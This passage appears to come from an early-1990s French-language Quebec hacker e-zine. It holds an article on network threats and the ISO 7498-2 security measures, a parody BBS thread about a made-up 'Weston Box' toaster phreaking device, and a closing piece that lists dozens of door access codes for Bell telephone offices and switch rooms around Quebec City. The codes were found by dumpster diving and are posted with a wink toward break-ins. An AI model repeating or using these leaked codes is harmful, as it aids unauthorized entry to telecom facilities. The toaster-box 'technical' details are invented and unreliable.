bon franais, c'est un petit programme, import d'un autre systme,
ou crit sur le rseau, et qui modifie le programme d'acquisition
des mots de passe pour qu'
chaque fois que quelqu'un se logge sur
le rseau, le programme, en plus d'excuter la fonction
d'authentification de l'usager et d'enregistrement de son heure
d'accs (et toute cette sorte de chose), CRE un fichier SPCIAL o
il note tous les noms et mots de passe. Le petit malin qui a crit
cette trapdoor peut revenir plus tard et, grce
une ou deux
commandes bien choisies, rcuprer ce fichier secret. Le pactole,
les kids! C'est d'ailleurs grce
ce type de programme, de
trapdoors, que le Chaos Computer Club s'tait rendu clbre,
la
fin des annes 80. Plusieurs allemands, dont le clbre Pengo,
avaient ainsi hack les systmes de la NASA, jusqu'
l'os... et
avaient tent de vendre le fruit de leur labeur
l'Allemagne de
l'Est...
5) Trojan: Pour ceux qui viennent de se joindre
nous, et qui ne
sauraient pas ce
qu'est un trojan, il s'agit d'une marque de
condoms... Ha! Et si vous croyez cela, vous tes peut-tre mieux de
fermer ce magazine et d'aller acheter ALLO-POLICE...
C'est a qui est a... Ce sont les cinq dangers qui, en gros,
menacent les rseaux. Plus prcisment, les cinq dangers RECENSS
par les constructeurs de rseaux. Toute autre forme d'attaque que
vous pourriez concevoir couperait dans leurs scurits comme dans
du beurre. En passant, si vous devisez une nouvelle tactique,
contactez-nous! Si vous trouvez, par exemple, un moyen de a)
capturer le fichier encrypt des users et de leur mot de passe, et
que B) vous connaissez l'algorithme d'encryptage, les sysadmin n'y
verront que du feu. Pourquoi? Parce qu'ils travaillent tous avec
leur bible, et que leur bible dit ceci et pas autre chose... Cette
bible s'appelle OPEN SYSTEMS INTERCONNECTION REFERENCE MODEL
(OSIRM), addenda 2 de OSIRM (ISO 7498-2), publie en 1989. La bible
est formelle, les kids, elle ne reconnait que ces 5 types
d'attaques, et ne propose des rponses stratgiques qu'
ces
attaques seulement. Et encore, a s'adresse UNIQUEMENT aux
sysadmins qui savent lire! Parce que... comment vous dire... des
rseaux qui appliquent les mesures de scurit qui vont suivre,
conformment aux recommandations de la bible, il n'y en a pas des
chars. N'est-ce pas, Coaxial? ;-)
LES CINQ MESURES DE SCURIT DES RSEAUX
Les cinq rponses proposes aux sysadmins se rsument en quelques
mots:
-authentification de l'usager
-contrle des niveaux d'accs
-confidentialit des donnes
-vrification de l'intgrit des fichiers
-authentification de la date d'originale des fichiers
Et autour de cela, il y a plein de mesures effectives qui se
greffent, pour palier
toutes les ventualits que les
crivaillons de la bible ont imagin. Ces mesures sont, dans
l'ordre et dans le dsordre...
ENCRYPTAGE
The SubHuman Punisher, lou soit son handle, nous prpare pour le
mois prochain un texte plutt fouill sur la question (probablement
un rip d'un T-file serbo-croate traduit du latin ancien, s'il faut
en croire les lgumes qui font office de dtracteurs de NPC). Je ne
tenterai pas de surenchrir sur cet ouvrage qui fera date, et me
contenterai donc de dsigner plutt les niveaux o l'encryptage
devrait avoir sa place. Besides, a va tre moins compliqu pour
moi ;-) L'encryption devrait, dans un systme qui se veut
scuritaire, avoir lieu au moment de l'archivage des donnes, donc
sur les fichiers mmes, et au niveau de la transmission elle-mme
des donnes sur le rseau ainsi que sur les fils du tlphone.
CONTROLE DE L'ACCES
A) Listes des capacits d'un usager: c'est l'quivalent de la
liste des usagers que les sysops de babs connaissent bien. A chaque
commande d'un usager, le programme vrifie si l'usager en question
est autoris
utiliser cette commande.
B) Mots de passe: L'utilisation de mots de passe par les usagers...
bof, vous tes capables de deviner celle-l
, non? Si il y a une
chose que je dteste, c'est crire pour ne rien dire... Ceci dit,
la fucking bible des sysadmins conseille de multiplier les niveaux
de mots de passe. Idalement, il faudrait qu'un usager soit appel
entrer un mot de passe
chaque commande qu'il fait. Ca serait
pratique d'abord!
C) Liste de contrle d'accs: Comme sur les babs, encore une fois,
le systme vrifie si un usager
accs
ce rseau.
VRIFICATION DE L'INTGRIT DES FICHIERS
On parle ici de beaucoup plus que la vrification habituelle des
fichiers uploads sur un bab, en ce sens que les fichiers sont
analyss, pour savoir s'ils contiennent des virus, certes, mais
aussi afin de savoir si, d'un jour
l'autre (la bible recommande
des inspections quotidiennes du contenu du systme), la taille des
fichiers ou leur date originelle n'a pas t modifie, ce qui
indiquerait la prsence d'un trojan ou d'un trapdoor.
MODIFICATION DES ROUTES DE DONNES
Pour les rseaux VRAIMENT pousss, et j'entends par l
les systmes
qui contiennent des donnes, comme on dit, cruciales, il existe
aussi la modification des routes de donnes. Ca consiste en gros
ne jamais utiliser deux fois de suite les mmes lignes et le mme
rseau de communication
chaque fois que des packets voyagent. Les
compagnies propritaires de leurs lignes data peuvent, par exemple,
transfrer d'un trunk
l'autre le flot des donnes, pour fucker
ceux qui seraient directement branchs sur la ligne de
transmission. Encore l
, ce genre d'arrangement est plutt
sophistiqu, si vous voulez mon avis. Mais il est utilis: les
caisses Desjardins, par exemple, sont PROPRITAIRES de trois cbles
de fibre optique qui relient les bureaux de Montral et ceux du
sige social de Lvis. Et c'est sans parler des backups. Le Bell
gre trois Datapak optiques, exclusifs
Desjardins, au cas o le
premier systme ferait dfaut. Et comme si ce n'tait pas assez,
Desjardins loue une ligne satellite
Tlcom Canada... C'est ce
qui s'appelle prvoir pour le pire, les petits gars...
LES TRUCS CARRMENT FARFELUS
Vous avez dj
entendu parler des vibrations captes sur les
fentres avec des faisceaux lasers? Pour rsumer (et c'est bien
parce que le prochain James Bond n'est pas pour demain: que fait
Brocoli?), lorsque quelqu'un parle dans une pice, il met des
vibrations. Si il y a par exemple une fentre dans la pice, celle-
ci va vibrer au son de la voix, de la musique, etc... Un faisceau
laser braqu sur ladite fentre peut, avec l'quipement appropri,
valuer
distance les vibrations de la fentre, et restituer ce
qui se dit dans la pice. Pt, quand mme... Comme dirait Mental
Floss, il y a du monde de pas mal rong...
Et c'est tout!
C'est tout ce qu'ils ont invent pour protger leurs rseaux! Ils
ne sont mme pas foutus, pour les appels extrieurs, d'instaurer
une procdure standard de rappel automatique (comme les valideuses
des babs). Il y a bien quelques compagnies qui tentent de pousser
l'instauration de cls-codes (une cl-code, c'est un bidule
lectronique qui met un signal que le node du rseau reoit, et
qui authentifie l'usager. Si l'ordi de la personne qui communique
ne possde pas la bonne cl lectronique, le logon ne fonctionne
pas), mais l'instauration de telles mesures sur tous les systmes
n'est pas pour demain. Et puis, chaque offensive des sysadmins pour
nous chasser comporte sa parade... Des systmes, pour peu que vous
hackiez un tant soit peu, vous allez en rencontrer. Et vous allez
vous apercevoir que la quasi-majorit des rseaux n'est pas foutue
d'appliquer des rgles de scurit lmentaires... Remarquez, les
sysadmins sont des tres humains, aprs tout. Ils sont bien souvent
trop peu pour le nombre d'appareils qu'ils doivent superviser. Et
qui plus est, la majorit du temps qu'ils pourraient consacrer
la
protection de leurs systmes est en ralit consacre
aller
dpanner la secrtaire du boss qui est gele dans Word Perfect, ou
le petit cadre
la comptabilit qui ne trouve plus son escape key.
Quand tu passes ton temps
teindre des incendies, comment veux-tu
trouver le temps d'installer un dtecteur de fume? Pas que ca
servirait
grand chose, remarquez. Il n'y a pas de systme qui ne
peut tre craqu par un pirate possdant les bons outils (HADES me
vient
l'esprit) et un minimum de connaissances...
Hasta la vista, les pros!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
MERCI D'ABUSER DE L'INTERURBAIN BELL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MEUNIER, TU DORS, TON MOULIN VA TROP VITE...
La Bread Box
par
-=ThE PoSSe=-
Ok les mecs... voici un petit log d'un change, avec The Subhuman
Punisher et Atreid Bevatron dans les rles principaux, ainsi que
Blitzkreig et Mental Floss comme figurants. Tout ce qui suit a t
captur sur "The HelloweeN BoarD", un BBS "renomm" de 418, avec au
moins un "LD", (un appeleur de 305/Miami), Toxic Threat pour ne pas
le nommer. La prsence de cet amricain fait d'ailleurs que le
sysop EXIGE de tous que les messages soient crits en anglais...
Ce qui a parti le bal, c'est un message de Crime Lord dans lequel
il demandait "Does anyone knows how to hack the new payfones". Il
parlait bien sur des nouveaux bolides du Bell, les Milleniums, ces
nouveaux tlphones publics qui acceptent les cartes de crdit...A
partir de l
, a a dgnr, et NPC est fier de vous prsenter la
Weston Box, a/k/a la Bread Box...
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 15 of 96
[When ]: 1/1/92 At 4:19 pm
[Subject]: New PayPhone [Reply #2]
[To ]: AtrEiD BeVaTRoN [Received]
[From ]: The SubHuMaN PunisheR <Level 50> <[NpC MeMBeR]>
Ever heard about COCOTs ? Customer-Owned Coin Operated Telephone?
Those can be hacked. Anyway.
BTW, did i tell you how i hacked my toaster? Great! All you need is
WESTON white bread and a toaster. First, buy a 864565 OHmz crystal,
2,5 watts condensators, and some alligator clips (with some wires).
Plug the clips into the condensators, one end on the crust, the
other in the right slot of the toaster, condensators in the middle.
Upwire the crystal upside down on the flipped side of the backward
toaster (still following?), and do a 360ø rotation on the Y axis of
the bread. Don't care 'bout the grains falling. Then plug your
alligators on another slice, and mix the two slices. Here's an
awesome schema showing what your new WESTON BOX will look like...
/~~~~~\ ____/~ø\~~~~\~~~~\
o--\+~X_/ \ . \ . \
\ / \ \ . \ . \
/___\ \______ \ . \ . \-----<~~~~~\
\ \____\____\ . .
\ _ \ . /
\_ /_____\
\_________
You now have modified your toaster so that it could grill 4 bread
slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than
that!!!! If you plug the alligators on your phone line, you will
get free calls everywhere in the WORLD!!!! So now you can call
everywhere for free, and grill 4 slice of breads at the same
time!!!! Fantastic eh?
Till later bud!
TSP
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 18 of 96
[When ]: 1/1/92 At 5:20 pm
[Subject]: New PayPhone [Reply #3]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: AtrEiD BeVaTRoN <Level 50> <NpC MeMBeR>
> BTW, did i tell you how i hacked my toaster? Great! All you need
> is WESTON white bread and a toaster.
I don't buy WESTON bread... Is that OK with some Multi-Mark?
> and do a 360ø rotation on the Y axis of the bread.
Well... I think it's surely not a 360 rotation... probably a 40,56
rotation on the X axis of the bread... With a 360 on the Y, you'll
burn your bread everytime..... and when you'll try to call, they
will be able to trace you... but not with a 40,56 on the X...
> /~~~~~\ ____/~ø\~~~~\~~~~\
> o--\+~X_/ \ . \ . \
> \ / \ \ . \ . \
> /___\ \______ \ . \ . \-----<~~~~~\
> \ \____\____\ . .
> \ _ \ . /
> \_ /_____\
> \_________
Yeah!!! NOW, I know what you're talking about!
>You now have modified your toaster so that it could grill 4 bread
>slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than
>that!!!! If you plug the alligators on your phone line, you will
>get free calls everywhere in thw WORLD!!!! So now you can call
>everywhere for free, and grill 4 slice of breads at the same
>time!!!! Fantastic eh?
WHAT?!?! Is that possible? You mean that you can CALL EVERYWhere in
the world AND grill some bread AT THE SAME TIME?!?? Well... You
surely have the new brand of CPU... I've only a 6478HarQ in MY
toaster... It's quite poor in multi-tasking... You probably have a
6878HarT... Those are newer and really better!! But... I've a
question... :
What do you have to do when you want to hang-up the phone? You take
the bread off?? It could be good to put a switch or something...
Well... I'm working on some ARTIFICIAL bread for your board... I'll
give you all the news about that...
Did you ever tried that with a steak? Pretty cool...
Later moron... ;)
AtrEiD
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 23 of 96
[When ]: 1/1/92 At 10:33 pm
[Subject]: New PayPhone [Reply #4]
[To ]: AtrEiD BeVaTRoN [Received]
[From ]: The SubHuMaN PunisheR <Level 50> <[NpC MeMBeR]>
ĵ > BTW, did i tell you how i hacked my toaster? Great! All you
need
ĵ > is WESTON white bread and a toaster.
ĵ
ĵI don't buy WESTON bread... Is that OK with some Multi-Mark?
No! NO! NOOOO! Hey! The WESTON is the next generation's bread! I
should introduce you to a Weston bread party! All you need is a
6-pack of Weston and peanut butter. Pretty cool.
ĵ > and do a 360ø rotation
ĵ >on the Y axis of the bread.
ĵ
ĵWell... I think it's surely not a 360 rotation... propably a
40,56 rotation
ĵon the X axis of the bread... With a 360 on the Y, you'll burn
your bread
ĵeverytime..... and when you'll try to call, they will be able to
trace
ĵyou... but not with a 40,56 on the X...
Maybe... but that way, you could'nt call an inward operator.
Anyway, ANI/ESS is not yet implemented on the BreadLines, so why
bother covering your ass?
AB> > /~~~~~\ ____/~ø\~~~~\~~~~\
AB> > o--\+~X_/ \ . \ . \
AB> > \ / \ \ . \ . \
AB> > /___\ \______ \ . \ . \-----<~~~~~\
AB> > \ \____\____\ . .
AB> > \ _ \ . /
AB> > \_ /_____\
AB> > \_________
AB>
AB> Yeah!!! NOW, I know what you're talking about!
Hope you do. But I will get out the IMPROVED WESTON BOX in the
near future. Look for it, I will include GIFs.
ĵ >You now have modified your toaster so that it could grill 4
bread
ĵ >slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than
ĵ >that!!!! if you plug the alligators on your phone line, you
will
ĵ >get free calls everywhere in thw WORLD!!!! So now you can call
ĵ >everywhere for free, and grill 4 slice of breads at the same
ĵ >time!!!! fantastic !
ĵ
ĵWHAT?!?! Is that possible? You mean that you can CALL EVERYWhere
in the
ĵworld AND grill some bread AT THE SAME TIME?!?? Well... You
surely have the
ĵnew brand of CPU... I've only a 6478HarQ in MY toaster... It's
quite poor in
ĵmulti-tasking... You probably have a 6878HarT... Those a newer
and really
Yeah!!!!#%$ k-rad isn't it? I have a 6578HarQ... but your trouble
is e-z to solve; get a 806358P2H3P grill accelerator. And if it
isn't enuff, get a 6479GarQ co-processor.
ĵWhat do you have to do when you want to hang-up the phone? You
take the
ĵbread off?? That could be good to put a switch or something...
If you'd have half-a-brain, you would have figured out that the
GRiLL control Panel is similar to the AT command set.
ĵDid you ever tried that with a steak? Pretty cool...
No i didn't... But i think that you just have to take a BB-Q grill
instead of a toaster ?! I'd suggest a T-Bone, cause they have a
voltage control panel included.
Till later, fuckface!
TSP
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 30 of 96
[When ]: 12/31/199 At 7:05 pm
[Subject]: New PayPhone [Reply #5]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: AtrEiD BeVaTRoN <Level 50> <NpC MeMBeR>
>No! NO! NOOOO! Hey! The WESTON is the next generation's bread! I
>should introduce you to a weston bread party! All you need is a
>6-pack of weston and peanut butter. pretty cool.
Are you really sure of that??? Humm... Kinda strange... But I'm
really interested about the weston bread party... that could be
"MeGA-C0oL"!! But... I don't like peanut butter... May I just buy
some jam?
>ĵWell... I think it's surely not a 360 rotation... propably a
40,56
>ĵon the X axis of the bread... With a 360 on the Y, you'll burn
you
>ĵeverytime..... and when you'll try to call, they will be able
to t
>ĵyou... but not with a 40,56 on the X...
>
>Maybe... but that way, you couldn't call an inward operator.
Anyway,
>ANI/ESS is not yet implemented on the BreadLines, so why bother
>covering your ass?
Did you ever try to use a Jam Box with your Weston Box? With that,
you'll be able to use your 2 boxes as if they are a "Phone of the
future"...
>Yeah!!! NOW, I know what you're talking about!
>
> Hope you do. But I will get out the IMPROVED WESTON BOX in the
>near future. Look for it, I will include GIFs.
What do you think about a EGA/VGA interface? I can do that for U...
since you've found a new way to the phreaking life!
>Yeah!!!!#%$ k-rad itsnt it? I have a 6578HarQ... but your trouble
>is e-z to solve; get a 806358P2H3P grill accelerator. And if
itsnt
>enuff, get a 6479GarQ co-processor.
Humm... I've a friend with an Amiga... He has the VIDEO TOASTER
card... is that good for your Weston Box? I've heard a lot about
it...
>If you'd have half-a-brain, you would have figured out that the
>GRiLL control Panel is similar to the AT command set.
Gimme the string to configure my Bread... is that :
BREAD GRILL 4441919 TOAST BEACON EGG
or
BREAD TOASTER PHONE 4441919 EGG ORANGE JUICE BREAKFAST
I can't figure it out...
>No i didnt... But i think that you just have to take a BB-Q grill
>instead of a toaster ?! I'd suggest a T-Bone, cause they have a
>voltage control panel included.
My BBQ grill is out of date.... I mean... it doesn't work with
gaz... I've an old Charcoal BBQ... That could be a waste of
charcoal... and if BELL or the COPs see the smoke.... ooohh....
they will know I'm a phreaker....
Later, G0D of Phreak!
AtrEiD
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 33 of 96
[When ]: 12/31/199 At 8:13 pm
[Subject]: New PayPhone [Reply #5]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: Blitzkreig <Level 35> <NpC EDiTOR>
Yo! I've tried your shit with a Pop Tarts in my toaster... K-RaD!
I got meself full control on the two canadian satellites. Actually,
Anik is, by my own command, beeming lots of microwaves to your
house... Don't you smell something burning? Your brain perhaps?
---=BlItZkReIg=---
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 36 of 96
[When ]: 12/31/199 At 9:12 pm
[Subject]: New PayPhone [Reply #6]
[To ]: AtrEiD BeVaTRoN [Received]
[From ]: The SubHuMaN PunisheR <Level 50> <[NpC MeMBeR]>
ĵ >Maybe... but that way, you couldn't call an inward operator.
Anyway,
ĵ >ANI/ESS is not yet implemented on the BreadLines, so why bother
ĵ >covering your ass?
ĵ
ĵDid you ever try to use a Jam Box with your Weston Box? With
that, you'll be
ĵable to use your 2 boxes as if they are a "Phone of the
future"...
Yeah... i've already thought about that. But i soon found out that
a Lunch Box is way more than a Jam Box; cause it have all the jam's
advantages, and it is pectine free!
ĵ > Hope you do. But I will get out the IMPROVED WESTON BOX in the
ĵ >near future. Look for it, I will include GIFs.
ĵ
ĵWhat do you think about a ega/vga interface? I can do that for
U... since
ĵyou've found a new way to the phreaking life!
Yeah it would be B00MIDY/Fuzzy/Funky//<-rad! With PC Speaker
support and mega-kewl ASCIi grfx!
ĵ >If you'd have half-a-brain, you would have figured out that the
ĵ >GRiLL control Panel is similar to the AT command set.
ĵ
ĵGimme the string to configure my Bread... is that :
ĵ
ĵBREAD GRILL 4441919 TOAST BEACON EGG
ĵ
ĵor
ĵ
ĵBREAD TOASTER PHONE 4441919 EGG ORANGE JUICE BREAKFAST
ĵ
ĵI can't figure it out...
Mine is:
Salami/Ham/Egg=1 Grill=3,5 GrillTime=1,75 ReToastPause=20. I am now
working on a bread box that would act like a phone directory.
ĵMy BBQ grill is out of date.... I mean... it doesn't work with
gaz... I've
ĵan old Charcoal BBQ... That could be a waste of charcoal... and
if BELL or
ĵthe COPs see the smoke.... ooohh.... they will know I'm a
phreaker....
And you'll be toasted...
Later, Elite d00d.
TSP
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 40 of 96
[When ]: 12/17/187 At 6:11 pm
[Subject]: New PayPhone [Reply #7]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: AtrEiD BeVaTRoN <Level 50> <NpC MeMBeR>
>Yeah it would be B00MIDY/Fuzzy/Funky//<-rad! With PC Speaker
>support and mega-kewl ASCIi grfx!
Yeah like the Lancelot magazine... as good as it... ;-)
>Mine is:
>Salami/Ham/Egg=1 Grill=3,5 GrillTime=1,75 ReToastPause=20. I am
now
>working on a bread box that would act like a phone directory.
Hey! This stuff is not legal!!!! If you do that, you'll be a
criminal, SO STOP NOW or BELL will put you in jail!
> µMy BBQ grill is out of date.... I mean... it doesn't work with
gaz..
> ĵan old Charcoal BBQ... That could be a waste of charcoal...
and if B
> ĵthe COPs see the smoke.... ooohh.... they will know I'm a
phreaker..
>
> And you'll be toasted...
DEAD burn... ;-)
AtrEiD
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[Message]: 41 of 96
[When ]: 10/9/146 At 6:34 pm
[Subject]: New PayPhone [Reply #5]
[To ]: The SubHuMaN PunisheR [Received]
[From ]: Mental Floss <Level 50> <NpC MeMBeR>
TSP> introduce you to a weston bread party! All you need is a
TSP> 6-pack of weston and peanut butter. pretty cool.
Nah man, you're wrong... for a Weston party..you need to come with
a yellow electric guitar (without the case, quite important)...
Invite some of your long-hairs friends...and together put peanut
butter on some slide when watchin MUSIC PLUS... pretty cool party
uh?
And remember...
Weston, your generation's favorite...
...ask for it by name...
later
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Eh oui... dj
termin....
-L'eau gude baille Subhuman Punisher fort Fonne Ouique One Laine-
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
MERCI DE SWITCHER A UNITEL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
IL FAUT RENDRE A CSAR CE QUI APPARTIENT A CSAR
ou
OUVREZ LES PORTES, QUE L'ON RESPIRE!
par
THX 1138
Mental Floss et Blitzkreig m'ont dit que ce numro, le 4, tait
consacr au thme "AYEZ UNE CONSCIENCE SOCIALE".
"THX, m'ont-ils dit, il y a des gens qui te trouvent trop heavy. Tu
passes pour un psychopathe aux yeux de certains. Fait preuve de
civisme. Comme les scouts, tiens: fais donc une bonne action envers
la socit". Pas de problme, leur ai-je dit, je vais recommander
aux gens d'aller payer leurs comptes de Bell. Tu peux pas tre plus
civique que a, me semble. Et une fois n'est pas coutume. On sait
que la compagnie a un NORME besoin d'argent, alors...
Alors, les amis, allez payer vos comptes aux bureaux du Bell de
votre rgion. Mais si, par hasard, vous arrivez, excellents
citoyens que vous tes,
la porte d'un bureau du Bell et que
personne ne rponde
vos sonneries, voici les codes des portes de
TOUS les bureaux du Bell de la grande rgion de Qubec. Vous
pourrez ainsi aller payer vos comptes
toute heure du jour ou de
la nuit. Surtout la nuit...
J'ai trouv ce petit carnet lors d'un trash en solitaire. Il s'agit
fort probablement d'une liste distribue aux techniciens qui font
l'entretien de tous les systmes de ces endroits. La liste n'est
plus valable, apparemment, depuis le 1er fvrier, mais a
m'tonnerait BEAUCOUP que tous les numros soient changs
chaque
mois...
Alors, voici cette liste. Je me suis dit que a pourrait vous tre
utile. Vous pourrez ainsi entrer et laisser votre paiement sur le
coin d'un bureau, et repartir aussi vite sans rien toucher...
LISTE DES CODES DES PORTES PRIODE DU 4 JANVIER AU 1ER FVRIER
S.P.A.C pour tous les bureaux 2-4-6-8
Toutes les salles btiments 32-15
St-Ral (entre) 42-13
St-Ral (tages) 21-4
St-Ral (DMS) 15-32
(B23, B30, 203, 206, 209, 216)
St-Ral Comm. Inform. (519) 13-24
D'Aiguillon (Entre) 23-54
D'Aiguillon (Intrieur) 24-15
D'Aiguillon (B222, Cos) 13-24
D'Aiguillon (Comm. Inform.) 13-24
St-Cyrille (Entre) 53-42
St-Cyrille (2 tage) 42-13
St-Cyrille (DMS, salle conf.) 13-42
Vanier - Rue Plante (DMS-1U) 53-42
Vanier - Rue Godin (CCD) 53-42
Ste-Foy (ext.) 41-35
Ste-Foy (int.) 35-2
Ste-Foy (cadenas) N/A
Cap-Rouge OPM (Provencher)
quipement 5-2-9-3
Rpartiteur 1-8-3-9
Cap-Rouge OPM (Des Chasseurs)
quipement 1-8-3-5
Rpartiteur 5-1-3-7
Cap-Rouge (DMS-1U) Des Clercs 3-6-9-2
Lvis 23-41
Lvis (RCU) 4-0-0-1/
1-0-0-4
St-Jean Chrysostome 23-41
Charny 23-41
St-Romuald 23-41
St-Romuald (int.) 42-3
St-Nicolas 23-41
St-Nicolas (DMS 1U) 1-0-0-4/
4-0-0-1
Beaumont hutte 34-12
Hutte St-Etienne 34-12
Breakeyville DMS-1U 4-0-0-1
Loretteville (ext.) 43-25
Loretteville (int.) 15
Loretteville DMS-1U 1-4-0-8
Ste-Catherine 43-21
Ste-Catherine (DMS-1U) 1-4-0-8
Ancienne-Lorette 15-24
DMS-1U Anc.-Lor. 1-4-0-8
Hutte Ste-Famille 31-42
Valcartier 54-23
DMS-1U Valcartier 1-4-0-8
Charlesbourg 34-25
Charlesbourg int. 41-2
Charlesbourg DMS-1U 4-3-1-2
N. D. Laurentides 34-25
N. D. Laurentides (DMS-1U) 4-3-1-2
Stoneham 34-25
Parc Laurentides 21-4-3
Tewkesbury (DMS-1U) 4-3-1-2
Beauport 21-34
Boischatel 52-31
Ste-Brigitte 52-34
Ste-Anne-de-Beaupr 51-24
St-Tite 13-42
St-Fereol 54-32
Hutte Mt-Ste-Anne 25-42
St-Jean I.O. 51-42
Ste-Petronille I.O. 12-43
Hutte Ste-Famille 31-42
Bon, je crois que les huttes, ce sont les petites cabanes situes
au coins des rues, ici et l
, et qui ne contiennent que les
"manholes" pour accder aux cbles. Vous ne pourrez pas aller payer
vos comptes du Bell l
, donc. Mais les autres bureaux, c'est...
Comment?
On ne peut pas aller comme a payer ses comptes au bureau du Bell?
Qu'est-ce que tu racontes, Atreid!?
Ah?
Bon... Mais qu'est-ce qu'ils peuvent faire avec tous ces codes que
j'ai trouv?
Pardon?
Mais c'est illgal,
! Les gens ne peuvent pas faire a, voyons!
Phoque! Et moi qui croyais faire preuve de civisme aujourd'hui!
<grin>
<re-grin>
<very big grin>
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
DRING DRING, C'EST POUR JULIE
